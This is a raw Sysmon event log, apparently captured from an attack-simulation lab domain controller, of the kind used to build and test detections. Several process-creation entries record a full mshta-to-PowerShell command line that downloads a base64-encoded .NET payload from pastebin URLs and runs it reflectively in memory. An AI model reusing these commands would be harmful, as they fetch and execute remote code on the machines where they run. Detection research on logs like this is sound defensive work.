07:59:29.465{58E9C193-ACA5-615A-0B00-00000000FC01}628672C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.454{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.454{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.448{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.448{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.424{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.423{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.423{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.423{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.423{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.422{58E9C193-B458-615A-1F02-00000000FC01}4243116C:\Windows\System32\cmd.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.422{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.321{58E9C193-B458-615A-1D02-00000000FC01}42925540C:\Windows\System32\cmd.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.323{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 23542300x8000000000000000106492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.271{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59EAEC290D062A2CB0ADF891994E0045,SHA256=E40F387556FCAAA5F078035139CB666B43F1465CAF717503E4811B8F64DEC565,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:27.455{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51844-false10.0.1.12-8000- 10341000x8000000000000000106490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.182{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.182{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.182{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.182{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.182{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.177{58E9C193-B457-615A-1702-00000000FC01}16921584C:\Windows\System32\cmd.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.181{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 23542300x8000000000000000106593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.649{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=81C5CAC0E728D01C86FEAC6CC3D27877,SHA256=8493D18C17EFA8F6CCB6BA2F2B9B6A439D8BD76B3308587DB8F430E42145DFFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.606{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3819AB1BF9786E58B23BF7C9CCF20DE6,SHA256=E44B41C2436E5E3646D41C189CDF51D5C7D17FDF5B61BE2F945D07A580C67675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082966Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:30.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D0A1013B6B3AFA157BE2E01FBCD56F8,SHA256=81CF72C99ECCFD84BD104F68C207BB3B5F3651FA80C549B80111FEF974A52704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:30.183{58E9C193-ACC9-615A-7700-00000000FC01}2976NT 